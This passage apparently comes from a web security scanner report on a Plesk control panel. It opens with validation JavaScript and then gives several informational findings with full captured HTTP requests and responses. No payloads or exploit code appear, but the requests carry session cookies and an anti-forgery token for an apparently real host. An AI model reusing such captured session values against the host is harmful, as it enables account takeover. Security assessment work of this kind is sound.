   if (!found)
       return false;
   var i = found.length - 1;
   while (i && (found[i] == 0)) i--;
   if (!i)
       return true;
   if (
       (found[i] != 128) &&
       (found[i] != 192) &&
       (found[i] != 224) &&
       (found[i] != 240) &&
       (found[i] != 248) &&
       (found[i] != 252) &&
       (found[i] != 254) &&
       (found[i] != 255)
   )
       return false;
   i--;
   while (i && (found[i] == 255)) i--;

   return i == 0;
}

function ip2long(str)
{
   var num = 0;
   var re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   found = str.match(re);
   if (!found)
       return null;
   for (var i = 0; ++i < found.length; ) {
       num <<= 8;
       num |= found[i];
   }
   return num;
}

// convert ip block mask to int32 mask
function block_to_num(block)
{
   num = 0;
   for (var i = 0; i < 32; i++) {
       num <<= 1;
       num |= (block > i ? 1 : 0);
   }
   return num;
}

// check ip address and mask by valid rules
function chk_ip_address_and_mask(ip, valid, valid_formats)
{
   var ip_address_mask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.\*|)|\.\*\.\*|\.\*|)|\.\*\.\*\.\*|\.\*\.\*|\.\*|)()$/;
   var ip_address_block_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,2})$/;
   var ip_address_netmask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   var ip_address_format = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   if (!valid)
       valid = 7;
   if (!valid_formats)
       valid_formats = 15;

   var found;
   var ip_address = null;
   var ip_mask = null;

   if (
       (valid_formats & 1) &&
       (found = ip.match(ip_address_mask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255))
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long((found[1] ? 255 : 0) + '.' + (found[3] ? 255 : 0) + '.' + (found[5] ? 255 : 0) + '.' + (found[7] ? 255 : 0));
   } else if (
       (valid_formats & 2) &&
       (found = ip.match(ip_address_block_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 32)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = block_to_num(found[8]);
   } else if (
       (valid_formats & 4) &&
       (found = ip.match(ip_address_netmask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 223)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 255) &&
       (found[9] >= 0 && found[9] <= 255) &&
       (found[10] >= 0 && found[10] <= 255) &&
       (found[11] >= 0 && found[11] <= 255)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long(found[8] + '.' + found[9] + '.' + found[10] + '.' + found[11]);
   } else if (
       (valid_formats & 8) &&
       (found = ip.match(ip_address_format)) &&
       (found[1] >= 0 && found[1] <= 255) &&
       (found[2] >= 0 && found[2] <= 255) &&
       (found[3] >= 0 && found[3] <= 255) &&
       (found[4] >= 0 && found[4] <= 255)
   ) {
       ip_address = ip2long(found[1] + '.' + found[2] + '.' + found[3] + '.' + found[4]);
       ip_mask = block_to_num(32);
   }

   if (null == ip_address || null == ip_mask)
       return false;

   return ((valid & 1) && //network block
               ((ip_address & ip_mask) == ip_address)
       ) ||
       ((valid & 2) && // ip address with netmask
           ip_address && ip_mask &&
               (
                   ((ip_address & ~ip_mask) && // and not empty lower bits
                   ~((ip_address & ~ip_mask) | ip_mask) // minimum network size 'may be removed - bcause added single addres networks by client request ...
               ) || (ip_mask == block_to_num(32))
           ) // or single ip address
       ) ||
       ((valid & 4) && //sigle ip address
           ip_address && (ip_mask == block_to_num(32)) // not empty ip address and 0xFFFFFFFF ip mask
       );
}

function chk_ip_mask(ip, mask)
{
   if (!chk_ip(ip) || !chk_mask(mask))
       return false;

   var num_ip;
   var num_mask;

   if ((num_ip = ip2long(ip)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   // check ip/mask combination for interface:
   // 1) mask not null
   // 2) host part not null (num_ip & ~num_mask)
   // 3) host part not all 1 ~((num_ip & ~num_mask) | num_mask)
   return num_mask && (((num_ip & ~num_mask) && ~((num_ip & ~num_mask) | num_mask)) || (mask == '255.255.255.255'));
}

function chk_net_mask(net, mask)
{
   if (!chk_ip(net) || !chk_mask(mask))
       return false;

   var num_net;
   var num_mask;

   if ((num_net = ip2long(net)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   return num_mask && (num_net & num_mask) && ((num_net & num_mask) == num_net);
}

function chk_sys_passwd(username, passwd)
{
   if ((passwd.length < 4) || (passwd.length > 255))
       return false;

   if (passwd.length >= username.length) {
       if (passwd.indexOf(username, 0) != -1)
           return false;
   }

   if ((passwd.indexOf('\'') != -1) || (passwd.indexOf(' ') != -1))
       return false;

   for (var i = passwd.length; i-- > 0;) {
       if (passwd.charCodeAt(i) > 127)
           return false;
   }

   return true;
}

function chk_filename(filename)
{
   re = /^[^\']*$/;
   return filename.search(re) != -1;

}

function chk_uint(uint)
{
   re = /^[0-9]+$/;
   found = uint.match(re);
   if (!found) {
       return false;
   }

   return true;
}

12.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-dir/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/create-dir/

Request

POST /plesk/client@2/domain@1/hosting/file-manager/create-dir/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2F
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aTo5OTk5OTk7fQ%3D%3D; locale=en-US; psaContext=dashboard; PLESKSESSID=d92187f07d1a80c8d90db119609cd480
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 1189

-----------------------------265001916915724
Content-Disposition: form-data; name="forgery_protection_token"

ac96ec24fae152c446439f0afde39de7
-----------------------------265001916915724
Content-Disposition: form-data; name="cmd"

new_dir
-----------------------------265001916915724
Content-Disposition: form-data; name="lock"

true
-----------------------------265001916915724
Content-Disposition: form-data; name="previous_page"


-----------------------------265001916915724
Content-Disposition: form-data; name="wizaction"


-----------------------------265001916915724
Content-Disposition: form-data; name="filter"


-----------------------------265001916915724
Content-Disposition: form-data; name="page"

0
-----------------------------265001916915724
Content-Disposition: form-data; name="page_size"

999999
-----------------------------265001916915724
Content-Disposition: form-data; name="sort"

name
-----------------------------265001916915724
Content-Disposition: form-data; name="file"


-----------------------------265001916915724
Content-Disposition: form-data; name="subcmd"


-----------------------------265001916915724--

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 22:32:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 22:32:20 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/register-domain/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/register-domain/

Request

GET /plesk/client@2/register-domain/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/add-domain/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:12:44 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:12:44 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/featured-applications/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/admin-home/featured-applications/

Request

GET /smb/admin-home/featured-applications/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/admin-home
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:00 GMT
Connection: close
Content-Length: 11211

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.ListContainer({
renderTo: 'applicationItems-content-area-ajax-content',
items: [
new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/norton-box.png","title":"Norton Internet Security","info":"Protect your desktop against viruses and spyware","details":{"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/Persony%2C%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony%2C%20Inc.\/undefined\/undefined\/undefined\/resources\/images\/persony_icon.png","title":"Persony Web Conferencing","info":"Meet and collaborate with customers using web and video conferencing","details":{"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined\/resources\/images\/icon.png","title":"WordPress","info":"Easily create or maintain a website or blog","details":{"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined\/resources\/images\/pinnacle-icon.png","title":"PinnacleCart","info":"None","details":{"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined\/resources\/images\/icon.png","title":"Drupal","info":"Publish, manage and organize a wide variety of content on a website","details":{"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/pd6fm_box_mp.jpg","title":"Parallels Desktop for Mac","info":"Seamlessly run Windows applications on your Mac","details":{"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/domains-bttn-small.jpg","title":"Domain Names","info":"Register a new .COM, .NET or .ORG domain name","details":{"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined\/resources\/images\/icon.png","title":"joomla","info":"Build website and powerful online applications","details":{"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/keepit-box.png","title":"Keepit Online Backup","info":"Backup desktop files and documents to the Cloud","details":{"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/PPAV-icon.png","title":"Parallels Premium Anti-Virus","info":"Protect your customers' mailboxes against worms, Trojans and other viruses","details":{"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined\/resources\/images\/icon.png","title":"phpBB","info":"Create a web forum or bulletin board in minutes","details":{"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined\/resources\/images\/icon.png","title":"gallery","info":"Quickly organize your photos online","details":{"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/trust_wave.jpg","title":"Trustwave PCI Validation","info":"Utilize Trustwave monthly server scans to keep you PCI compliant","details":{"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]}} })
]
});
});
//]]>
</script>

12.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/categories-data/catalogId/apscatalog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/categories-data/catalogId/apscatalog

Request

GET /smb/app/categories-data/catalogId/apscatalog HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/available/id/apscatalog
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:24:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:24:10 GMT
Connection: close
Content-Length: 3763

<ul class="aps-category-list"> <li class="ac-web">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Web");'>Web</a>
<span>(86)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Web/Analytics");' >
Analytics</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Blog");' >
Blog</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Catalog");' >
Catalog</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Content management");' >
Content management</a>, <a href="#" onclick='apsCatalog.showCategory("Web/E-commerce");' >
E-commerce</a>, <a href="#" onclick='apsCatalog.showCategory("Web/eLearning");' >
eLearning</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Forum");' >
Forum</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Gallery");' >
Gallery</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Search");' >
Search</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Tools");' >
Tools</a> </div>
</div>
</li>
<li class="ac-collaboration">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Collaboration");'>Collaboration</a>
<span>(39)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Collaboration/Calendaring");' >
Calendaring</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Chat");' >
Chat</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Email");' >
E-mail</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/IP telephony");' >
IP telephony</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Portal");' >
Portal</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Project management");' >
Project management</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Web conferencing");' >
Web conferencing</a> </div>
</div>
</li>
<li class="ac-front-office">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Front office");'>Front office</a>
<span>(14)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Front office/Help Desk");' >
Help desk</a>, <a href="#" onclick='apsCatalog.showCategory("Front office/Productivity");' >
Productivity</a>, <a href="#" onclick='apsCatalog.showCategory("Front office/Survey Solutions");' >
Survey solutions</a> </div>
</div>
</li>
<li class="ac-back-office">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Back office");'>Back office</a>
<span>(8)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Back office/Accounting and Financial");' >
Accounting and Financial</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Asset Management");' >
Asset management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Billing");' >
Billing</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Compliance and Risk Management");' >
Compliance and Risk Management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Customer Relationship Management");' >
Customer relationship management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Enterprise Resource Planning");' >
Enterprise resource planning</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Knowledge Management");' >
Knowledge management</a> </div>
</div>
</li>
</ul>

12.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/install/metaId/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/install/metaId/1

Request

GET /smb/app/install/metaId/1 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/eula/metaId/1
Cookie: locale=en-US; psaContext=dashboard; PLESKSESSID=483627fb8a4e908eab18dad06863ab2f
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 May 2011 01:12:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 24 May 2011 01:12:46 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
